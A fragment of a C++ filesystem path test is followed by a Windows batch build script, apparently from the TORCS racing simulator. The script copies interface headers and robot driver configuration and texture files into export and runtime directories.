<< DISPLAY(TC.filename);
assert(&Ref == &p);
// Tests Effects "as-if": remove_filename() append(filename)
{
path p2(TC.value);
path replace(TC.filename);
p2.remove_filename();
p2 /= replace;
ASSERT_EQ(p, p2);
}
}
return 0;
}
| {
"pile_set_name": "Github"
} |
@echo off
set RUNTIMEDIR=%1
if defined RUNTIMEDIR goto build
echo Parameter missing, please do not execute generic scripts directly
exit /b
:build
call .\create_dir .\export
call .\create_dir .\export\lib
call .\create_dir .\export\libd
if exist .\src\interfaces\*.* call .\create_dir .\export
if exist .\src\interfaces\*.* call .\create_dir .\export\include
if exist .\src\interfaces\car.h copy .\src\interfaces\car.h .\export\include\car.h
if exist .\src\interfaces\graphic.h copy .\src\interfaces\graphic.h .\export\include\graphic.h
if exist .\src\interfaces\js.h copy .\src\interfaces\js.h .\export\include\js.h
if exist .\src\interfaces\playerpref.h copy .\src\interfaces\playerpref.h .\export\include\playerpref.h
if exist .\src\interfaces\raceman.h copy .\src\interfaces\raceman.h .\export\include\raceman.h
if exist .\src\interfaces\replay.h copy .\src\interfaces\replay.h .\export\include\replay.h
if exist .\src\interfaces\robot.h copy .\src\interfaces\robot.h .\export\include\robot.h
if exist .\src\interfaces\simu.h copy .\src\interfaces\simu.h .\export\include\simu.h
if exist .\src\interfaces\telemetry.h copy .\src\interfaces\telemetry.h .\export\include\telemetry.h
if exist .\src\interfaces\track.h copy .\src\interfaces\track.h .\export\include\track.h
if exist .\src\libs\txml\*.* call .\create_dir .\export
if exist .\src\libs\txml\*.* call .\create_dir .\export\include
if exist .\src\libs\txml\xml.h copy .\src\libs\txml\xml.h .\export\include\xml.h
if exist .\src\libs\txml\xmlparse.h copy .\src\libs\txml\xmlparse.h .\export\include\xmlparse.h
if exist .\src\libs\tgf\*.* call .\create_dir .\export
if exist .\src\libs\tgf\*.* call .\create_dir .\export\include
if exist .\src\libs\tgf\tgf.h copy .\src\libs\tgf\tgf.h .\export\include\tgf.h
if exist .\src\libs\tgf\os.h copy .\src\libs\tgf\os.h .\export\include\os.h
if exist .\src\libs\tgfclient\*.* call .\create_dir .\export
if exist .\src\libs\tgfclient\*.* call .\create_dir .\export\include
if exist .\src\libs\tgfclient\tgfclient.h copy .\src\libs\tgfclient\tgfclient.h .\export\include\tgfclient.h
if exist .\src\libs\tgfclient\screen_properties.h copy .\src\libs\tgfclient\screen_properties.h .\export\include\screen_properties.h
if exist .\src\libs\tgfclient\glfeatures.h copy .\src\libs\tgfclient\glfeatures.h .\export\include\glfeatures.h
if exist .\src\libs\client\*.* call .\create_dir .\export
if exist .\src\libs\client\*.* call .\create_dir .\export\include
if exist .\src\libs\client\client.h copy .\src\libs\client\client.h .\export\include\client.h
if exist .\src\libs\client\exitmenu.h copy .\src\libs\client\exitmenu.h .\export\include\exitmenu.h
if exist .\src\libs\confscreens\*.* call .\create_dir .\export
if exist .\src\libs\confscreens\*.* call .\create_dir .\export\include
if exist .\src\libs\confscreens\confscreens.h copy .\src\libs\confscreens\confscreens.h .\export\include\confscreens.h
if exist .\src\libs\confscreens\driverconfig.h copy .\src\libs\confscreens\driverconfig.h .\export\include\driverconfig.h
if exist .\src\libs\confscreens\joystickconfig.h copy .\src\libs\confscreens\joystickconfig.h .\export\include\joystickconfig.h
if exist .\src\libs\confscreens\mouseconfig.h copy .\src\libs\confscreens\mouseconfig.h .\export\include\mouseconfig.h
if exist .\src\libs\confscreens\controlconfig.h copy .\src\libs\confscreens\controlconfig.h .\export\include\controlconfig.h
if exist .\src\libs\confscreens\graphconfig.h copy .\src\libs\confscreens\graphconfig.h .\export\include\graphconfig.h
if exist .\src\libs\confscreens\soundconfig.h copy .\src\libs\confscreens\soundconfig.h .\export\include\soundconfig.h
if exist .\src\libs\confscreens\simuconfig.h copy .\src\libs\confscreens\simuconfig.h .\export\include\simuconfig.h
if exist .\src\libs\confscreens\openglconfig.h copy .\src\libs\confscreens\openglconfig.h .\export\include\openglconfig.h
if exist .\src\libs\racescreens\*.* call .\create_dir .\export
if exist .\src\libs\racescreens\*.* call .\create_dir .\export\include
if exist .\src\libs\racescreens\racescreens.h copy .\src\libs\racescreens\racescreens.h .\export\include\racescreens.h
if exist .\src\libs\robottools\*.* call .\create_dir .\export
if exist .\src\libs\robottools\*.* call .\create_dir .\export\include
if exist .\src\libs\robottools\robottools.h copy .\src\libs\robottools\robottools.h .\export\include\robottools.h
if exist .\src\libs\raceengineclient\*.* call .\create_dir .\export
if exist .\src\libs\raceengineclient\*.* call .\create_dir .\export\include
if exist .\src\libs\raceengineclient\singleplayer.h copy .\src\libs\raceengineclient\singleplayer.h .\export\include\singleplayer.h
if exist .\src\libs\raceengineclient\raceinit.h copy .\src\libs\raceengineclient\raceinit.h .\export\include\raceinit.h
if exist .\src\linux\*.* call .\create_dir .\export
if exist .\src\linux\*.* call .\create_dir .\export\include
if exist .\src\windows\osspec.h copy .\src\windows\osspec.h .\export\include\osspec.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\*.* call .\create_dir .\export
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\*.* call .\create_dir .\export\include
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\*.* call .\create_dir .\export\include\3D
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Basic.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Basic.h .\export\include\3D\Basic.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Matrix.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Matrix.h .\export\include\3D\Matrix.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Point.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Point.h .\export\include\3D\Point.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Quaternion.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Quaternion.h .\export\include\3D\Quaternion.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Tuple3.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Tuple3.h .\export\include\3D\Tuple3.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Tuple4.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Tuple4.h .\export\include\3D\Tuple4.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Vector.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\3D\Vector.h .\export\include\3D\Vector.h
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\*.* call .\create_dir .\export
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\*.* call .\create_dir .\export\include
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\*.* call .\create_dir .\export\include\SOLID
if exist .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\solid.h copy .\src\modules\simu\simuv2\SOLID-2.0\include\SOLID\solid.h .\export\include\SOLID\solid.h
if exist .\src\libs\math\*.* call .\create_dir .\export
if exist .\src\libs\math\*.* call .\create_dir .\export\include
if exist .\src\libs\math\*.* call .\create_dir .\export\include\tmath
if exist .\src\libs\math\linalg_t.h copy .\src\libs\math\linalg_t.h .\export\include\tmath\linalg_t.h
if exist .\src\libs\math\straight2_t.h copy .\src\libs\math\straight2_t.h .\export\include\tmath\straight2_t.h
if exist .\src\libs\math\v4_t.h copy .\src\libs\math\v4_t.h .\export\include\tmath\v4_t.h
if exist .\src\libs\math\v3_t.h copy .\src\libs\math\v3_t.h .\export\include\tmath\v3_t.h
if exist .\src\libs\math\v2_t.h copy .\src\libs\math\v2_t.h .\export\include\tmath\v2_t.h
if exist .\src\libs\learning\*.* call .\create_dir .\export
if exist .\src\libs\learning\*.* call .\create_dir .\export\include
if exist .\src\libs\learning\*.* call .\create_dir .\export\include\learning
if exist .\src\libs\learning\policy.h copy .\src\libs\learning\policy.h .\export\include\learning\policy.h
if exist .\src\libs\learning\ann_policy.h copy .\src\libs\learning\ann_policy.h .\export\include\learning\ann_policy.h
if exist .\src\libs\learning\ANN.h copy .\src\libs\learning\ANN.h .\export\include\learning\ANN.h
if exist .\src\libs\learning\learn_debug.h copy .\src\libs\learning\learn_debug.h .\export\include\learning\learn_debug.h
if exist .\src\libs\learning\real.h copy .\src\libs\learning\real.h .\export\include\learning\real.h
if exist .\src\libs\learning\string_utils.h copy .\src\libs\learning\string_utils.h .\export\include\learning\string_utils.h
if exist .\src\libs\learning\List.h copy .\src\libs\learning\List.h .\export\include\learning\List.h
if exist .\src\libs\learning\MathFunctions.h copy .\src\libs\learning\MathFunctions.h .\export\include\learning\MathFunctions.h
if exist .\src\libs\learning\Distribution.h copy .\src\libs\learning\Distribution.h .\export\include\learning\Distribution.h
rem if exist .\src\libs\learning\SmartAssert.h copy .\src\libs\learning\SmartAssert.h .\export\include\learning\SmartAssert.h
if exist .\src\libs\musicplayer\*.* call .\create_dir .\export
if exist .\src\libs\musicplayer\*.* call .\create_dir .\export\include
if exist .\src\libs\musicplayer\*.* call .\create_dir .\export\include\musicplayer
if exist .\src\libs\musicplayer\musicplayer.h copy .\src\libs\musicplayer\musicplayer.h .\export\include\musicplayer\musicplayer.h
if exist .\src\libs\musicplayer\OggSoundStream.h copy .\src\libs\musicplayer\OggSoundStream.h .\export\include\musicplayer\OggSoundStream.h
if exist .\src\libs\musicplayer\OpenALMusicPlayer.h copy .\src\libs\musicplayer\OpenALMusicPlayer.h .\export\include\musicplayer\OpenALMusicPlayer.h
if exist .\src\libs\musicplayer\SoundStream.h copy .\src\libs\musicplayer\SoundStream.h .\export\include\musicplayer\SoundStream.h
if exist .\src\libs\portability\*.* call .\create_dir .\export
if exist .\src\libs\portability\*.* call .\create_dir .\export\include
if exist .\src\libs\portability\portability.h copy .\src\libs\portability\portability.h .\export\include\portability.h
if exist .\src\drivers\berniw\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\1
if exist .\src\drivers\berniw\1\car1-stock1.rgb copy .\src\drivers\berniw\1\car1-stock1.rgb .\%RUNTIMEDIR%\drivers\berniw\1\car1-stock1.rgb
if exist .\src\drivers\berniw\1\default.xml copy .\src\drivers\berniw\1\default.xml .\%RUNTIMEDIR%\drivers\berniw\1\default.xml
if exist .\src\drivers\berniw\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\10
if exist .\src\drivers\berniw\10\car1-trb3.rgb copy .\src\drivers\berniw\10\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\berniw\10\car1-trb3.rgb
if exist .\src\drivers\berniw\10\default.xml copy .\src\drivers\berniw\10\default.xml .\%RUNTIMEDIR%\drivers\berniw\10\default.xml
if exist .\src\drivers\berniw\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\2
if exist .\src\drivers\berniw\2\car1-stock1.rgb copy .\src\drivers\berniw\2\car1-stock1.rgb .\%RUNTIMEDIR%\drivers\berniw\2\car1-stock1.rgb
if exist .\src\drivers\berniw\2\default.xml copy .\src\drivers\berniw\2\default.xml .\%RUNTIMEDIR%\drivers\berniw\2\default.xml
if exist .\src\drivers\berniw\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\3
if exist .\src\drivers\berniw\3\default.xml copy .\src\drivers\berniw\3\default.xml .\%RUNTIMEDIR%\drivers\berniw\3\default.xml
if exist .\src\drivers\berniw\3\car1-trb1.rgb copy .\src\drivers\berniw\3\car1-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\3\car1-trb1.rgb
if exist .\src\drivers\berniw\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\4
if exist .\src\drivers\berniw\4\default.xml copy .\src\drivers\berniw\4\default.xml .\%RUNTIMEDIR%\drivers\berniw\4\default.xml
if exist .\src\drivers\berniw\4\car2-trb1.rgb copy .\src\drivers\berniw\4\car2-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\4\car2-trb1.rgb
if exist .\src\drivers\berniw\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\5
if exist .\src\drivers\berniw\5\car3-trb1.rgb copy .\src\drivers\berniw\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\5\car3-trb1.rgb
if exist .\src\drivers\berniw\5\default.xml copy .\src\drivers\berniw\5\default.xml .\%RUNTIMEDIR%\drivers\berniw\5\default.xml
if exist .\src\drivers\berniw\5\car3-trb1.rgb copy .\src\drivers\berniw\5\car3-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\5\car3-trb1.rgb
if exist .\src\drivers\berniw\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\6
if exist .\src\drivers\berniw\6\car4-trb1.rgb copy .\src\drivers\berniw\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\6\car4-trb1.rgb
if exist .\src\drivers\berniw\6\default.xml copy .\src\drivers\berniw\6\default.xml .\%RUNTIMEDIR%\drivers\berniw\6\default.xml
if exist .\src\drivers\berniw\6\car4-trb1.rgb copy .\src\drivers\berniw\6\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\6\car4-trb1.rgb
if exist .\src\drivers\berniw\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\7
if exist .\src\drivers\berniw\7\default.xml copy .\src\drivers\berniw\7\default.xml .\%RUNTIMEDIR%\drivers\berniw\7\default.xml
if exist .\src\drivers\berniw\7\car5-trb1.rgb copy .\src\drivers\berniw\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\7\car5-trb1.rgb
if exist .\src\drivers\berniw\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\8
if exist .\src\drivers\berniw\8\default.xml copy .\src\drivers\berniw\8\default.xml .\%RUNTIMEDIR%\drivers\berniw\8\default.xml
if exist .\src\drivers\berniw\8\car6-trb1.rgb copy .\src\drivers\berniw\8\car6-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\8\car6-trb1.rgb
if exist .\src\drivers\berniw\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw\9
if exist .\src\drivers\berniw\9\default.xml copy .\src\drivers\berniw\9\default.xml .\%RUNTIMEDIR%\drivers\berniw\9\default.xml
if exist .\src\drivers\berniw\9\car7-trb1.rgb copy .\src\drivers\berniw\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw\9\car7-trb1.rgb
if exist .\src\drivers\berniw\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw
if exist .\src\drivers\berniw\berniw.xml copy .\src\drivers\berniw\berniw.xml .\%RUNTIMEDIR%\drivers\berniw\berniw.xml
if exist .\src\drivers\berniw\logo.rgb copy .\src\drivers\berniw\logo.rgb .\%RUNTIMEDIR%\drivers\berniw\logo.rgb
if exist .\src\drivers\berniw2\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\1
if exist .\src\drivers\berniw2\1\default.xml copy .\src\drivers\berniw2\1\default.xml .\%RUNTIMEDIR%\drivers\berniw2\1\default.xml
if exist .\src\drivers\berniw2\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\10
if exist .\src\drivers\berniw2\10\car1-trb3.rgb copy .\src\drivers\berniw2\10\car1-trb3.rgb .\%RUNTIMEDIR%\drivers\berniw2\10\car1-trb3.rgb
if exist .\src\drivers\berniw2\10\default.xml copy .\src\drivers\berniw2\10\default.xml .\%RUNTIMEDIR%\drivers\berniw2\10\default.xml
if exist .\src\drivers\berniw2\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\2
if exist .\src\drivers\berniw2\2\default.xml copy .\src\drivers\berniw2\2\default.xml .\%RUNTIMEDIR%\drivers\berniw2\2\default.xml
if exist .\src\drivers\berniw2\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\3
if exist .\src\drivers\berniw2\3\default.xml copy .\src\drivers\berniw2\3\default.xml .\%RUNTIMEDIR%\drivers\berniw2\3\default.xml
if exist .\src\drivers\berniw2\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\4
if exist .\src\drivers\berniw2\4\default.xml copy .\src\drivers\berniw2\4\default.xml .\%RUNTIMEDIR%\drivers\berniw2\4\default.xml
if exist .\src\drivers\berniw2\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\5
if exist .\src\drivers\berniw2\5\default.xml copy .\src\drivers\berniw2\5\default.xml .\%RUNTIMEDIR%\drivers\berniw2\5\default.xml
if exist .\src\drivers\berniw2\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\6
if exist .\src\drivers\berniw2\6\default.xml copy .\src\drivers\berniw2\6\default.xml .\%RUNTIMEDIR%\drivers\berniw2\6\default.xml
if exist .\src\drivers\berniw2\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\7
if exist .\src\drivers\berniw2\7\car5-trb1.rgb copy .\src\drivers\berniw2\7\car5-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw2\7\car5-trb1.rgb
if exist .\src\drivers\berniw2\7\default.xml copy .\src\drivers\berniw2\7\default.xml .\%RUNTIMEDIR%\drivers\berniw2\7\default.xml
if exist .\src\drivers\berniw2\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\8
if exist .\src\drivers\berniw2\8\car4-trb1.rgb copy .\src\drivers\berniw2\8\car4-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw2\8\car4-trb1.rgb
if exist .\src\drivers\berniw2\8\default.xml copy .\src\drivers\berniw2\8\default.xml .\%RUNTIMEDIR%\drivers\berniw2\8\default.xml
if exist .\src\drivers\berniw2\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2\9
if exist .\src\drivers\berniw2\9\default.xml copy .\src\drivers\berniw2\9\default.xml .\%RUNTIMEDIR%\drivers\berniw2\9\default.xml
if exist .\src\drivers\berniw2\9\car7-trb1.rgb copy .\src\drivers\berniw2\9\car7-trb1.rgb .\%RUNTIMEDIR%\drivers\berniw2\9\car7-trb1.rgb
if exist .\src\drivers\berniw2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw2
if exist .\src\drivers\berniw2\berniw2.xml copy .\src\drivers\berniw2\berniw2.xml .\%RUNTIMEDIR%\drivers\berniw2\berniw2.xml
if exist .\src\drivers\berniw2\logo.rgb copy .\src\drivers\berniw2\logo.rgb .\%RUNTIMEDIR%\drivers\berniw2\logo.rgb
if exist .\src\drivers\berniw3\1\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\1\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\1
if exist .\src\drivers\berniw3\1\default.xml copy .\src\drivers\berniw3\1\default.xml .\%RUNTIMEDIR%\drivers\berniw3\1\default.xml
if exist .\src\drivers\berniw3\10\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\10\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\10
if exist .\src\drivers\berniw3\10\default.xml copy .\src\drivers\berniw3\10\default.xml .\%RUNTIMEDIR%\drivers\berniw3\10\default.xml
if exist .\src\drivers\berniw3\2\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\2\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\2
if exist .\src\drivers\berniw3\2\default.xml copy .\src\drivers\berniw3\2\default.xml .\%RUNTIMEDIR%\drivers\berniw3\2\default.xml
if exist .\src\drivers\berniw3\3\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\3\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\3
if exist .\src\drivers\berniw3\3\default.xml copy .\src\drivers\berniw3\3\default.xml .\%RUNTIMEDIR%\drivers\berniw3\3\default.xml
if exist .\src\drivers\berniw3\4\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\4\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\4
if exist .\src\drivers\berniw3\4\default.xml copy .\src\drivers\berniw3\4\default.xml .\%RUNTIMEDIR%\drivers\berniw3\4\default.xml
if exist .\src\drivers\berniw3\5\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\5\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\5
if exist .\src\drivers\berniw3\5\default.xml copy .\src\drivers\berniw3\5\default.xml .\%RUNTIMEDIR%\drivers\berniw3\5\default.xml
if exist .\src\drivers\berniw3\6\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\6\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\6
if exist .\src\drivers\berniw3\6\default.xml copy .\src\drivers\berniw3\6\default.xml .\%RUNTIMEDIR%\drivers\berniw3\6\default.xml
if exist .\src\drivers\berniw3\7\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\7\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\7
if exist .\src\drivers\berniw3\7\default.xml copy .\src\drivers\berniw3\7\default.xml .\%RUNTIMEDIR%\drivers\berniw3\7\default.xml
if exist .\src\drivers\berniw3\8\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\8\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\8
if exist .\src\drivers\berniw3\8\default.xml copy .\src\drivers\berniw3\8\default.xml .\%RUNTIMEDIR%\drivers\berniw3\8\default.xml
if exist .\src\drivers\berniw3\9\*.* call .\create_dir .\%RUNTIMEDIR%
if exist .\src\drivers\berniw3\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers
if exist .\src\drivers\berniw3\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3
if exist .\src\drivers\berniw3\9\*.* call .\create_dir .\%RUNTIMEDIR%\drivers\berniw3\9
if exist .\src\drivers\berniw3\9\default.xml copy .\src\drivers\berniw3\9\default.xml .\%RUNTIMEDIR%\drivers\berniw3\9\default.xml
